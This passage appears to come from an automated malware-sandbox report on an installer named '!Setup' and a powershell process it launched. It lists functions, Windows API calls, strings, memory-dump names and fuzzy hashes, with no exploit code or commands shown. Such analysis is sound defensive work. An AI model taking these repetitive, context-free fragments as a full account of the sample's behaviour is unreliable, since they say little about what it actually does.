Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D79,759223A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: powershell.exePID: 2412, Parent PID: 6548COMMON

Executed Functions

Function 07471798 Relevance: 14.6, Strings: 11, Instructions: 842COMMON

Download Yara Rule

Strings

tPcq, xrefs: 07471815
$cq, xrefs: 074717AA
$cq, xrefs: 074717D0
$cq, xrefs: 074717DC
4'cq, xrefs: 07471DB0
4'cq, xrefs: 07471DA6
4'cq, xrefs: 07471999
4'cq, xrefs: 074719A5
tPcq, xrefs: 07471821
4'cq, xrefs: 07471F0A
4'cq, xrefs: 07471F00

Memory Dump Source

Source File: 00000010.00000002.2651772685.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq
API String ID: 0-3634899438
Opcode ID: 5c6ba3dcc06858822ebb907a0c5f43413d44821be3253fe8e28f9741ef12d33d
Instruction ID: f60f0bf79895246a6e95ca0e005937ea01a5c086bac06cba2afcba6d87c1a202
Opcode Fuzzy Hash: 5c6ba3dcc06858822ebb907a0c5f43413d44821be3253fe8e28f9741ef12d33d
Instruction Fuzzy Hash: D65249B1B0421A9FDB259B6888017EBBBF6AFC6210F14847BD545CB391DB31CD52C7A2

Function 00CC50E8 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9874433f308cc4b4f01866e28f1425bfd8c3999e700f0a8602682d46a34d17a
Instruction ID: 3d4a5ccc3dc5cef8bd8df6e489b26c2a31e7aa68c1258f73fa0b8fbbd9ede67e
Opcode Fuzzy Hash: c9874433f308cc4b4f01866e28f1425bfd8c3999e700f0a8602682d46a34d17a
Instruction Fuzzy Hash: 83422974A006099FCB15DFA8C494EAEBBF2FF88310F248559E815AB365C735ED81CB90

Function 00CC5E30 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f05a6c91711486332b648fe038cb8617b9ce1b89c22ec205788413878fc61df
Instruction ID: 9ece5db30554a11ce85256173aebc261f9245792891fecc7d9809d61c664e915
Opcode Fuzzy Hash: 6f05a6c91711486332b648fe038cb8617b9ce1b89c22ec205788413878fc61df
Instruction Fuzzy Hash: 3D12EA74A002199FCB14DF98C594EAEFBB2FF88310F258559E859AB361C735ED81CB90

Function 00CC4900 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539520488069a60dfe292518966a91041f3d6250c75a9728794e366d6be8b0d1
Instruction ID: 32998c019b080beecf35e3176a0cd66f03b953fa57a69b7ced4e521852c5ba76
Opcode Fuzzy Hash: 539520488069a60dfe292518966a91041f3d6250c75a9728794e366d6be8b0d1
Instruction Fuzzy Hash: A1D14B74A052599FCB05CFA8D490A9EFBF1EF49310F25C199E854AB362C731ED85CB90

Function 00CC4998 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfef4b6fbb15c0bceecaeebb261a7fe9e3381711891df4d8623820614a802a2
Instruction ID: 99efe690bd2dcc9708df100c0583ae948d7c412e92228081403ff0d55fa52421
Opcode Fuzzy Hash: dbfef4b6fbb15c0bceecaeebb261a7fe9e3381711891df4d8623820614a802a2
Instruction Fuzzy Hash: E2510775E012589FCB18CF98D490A9DFBB1AF88320F25C15AE859AB352C731EE45CB94

Function 07471A54 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2651772685.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c532fd9c44baf12d692b013219fb521a40e8f61cd2305bba8b9d06a0729dc7
Instruction ID: ff912f71eee663ae462b48cbc37da0d20c7b269cbbf66082904e421ef4715eee
Opcode Fuzzy Hash: c4c532fd9c44baf12d692b013219fb521a40e8f61cd2305bba8b9d06a0729dc7
Instruction Fuzzy Hash: FE4117F1A1020A9FDB248E6886417FB7BF5EFC0354F088466D9049F342E735D865C7A2

Function 00CC33F0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2646313521.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c9acb67c9fd0cddacaba90d49a618f15eaf6db8910812951eac17aab077f68
Instruction ID: 22fb09e444598b0a5aac8fca74510138c934960be345990b85e2c191109aa200
Opcode Fuzzy Hash: 59c9acb67c9fd0cddacaba90d49a618f15eaf6db8910812951eac17aab077f68
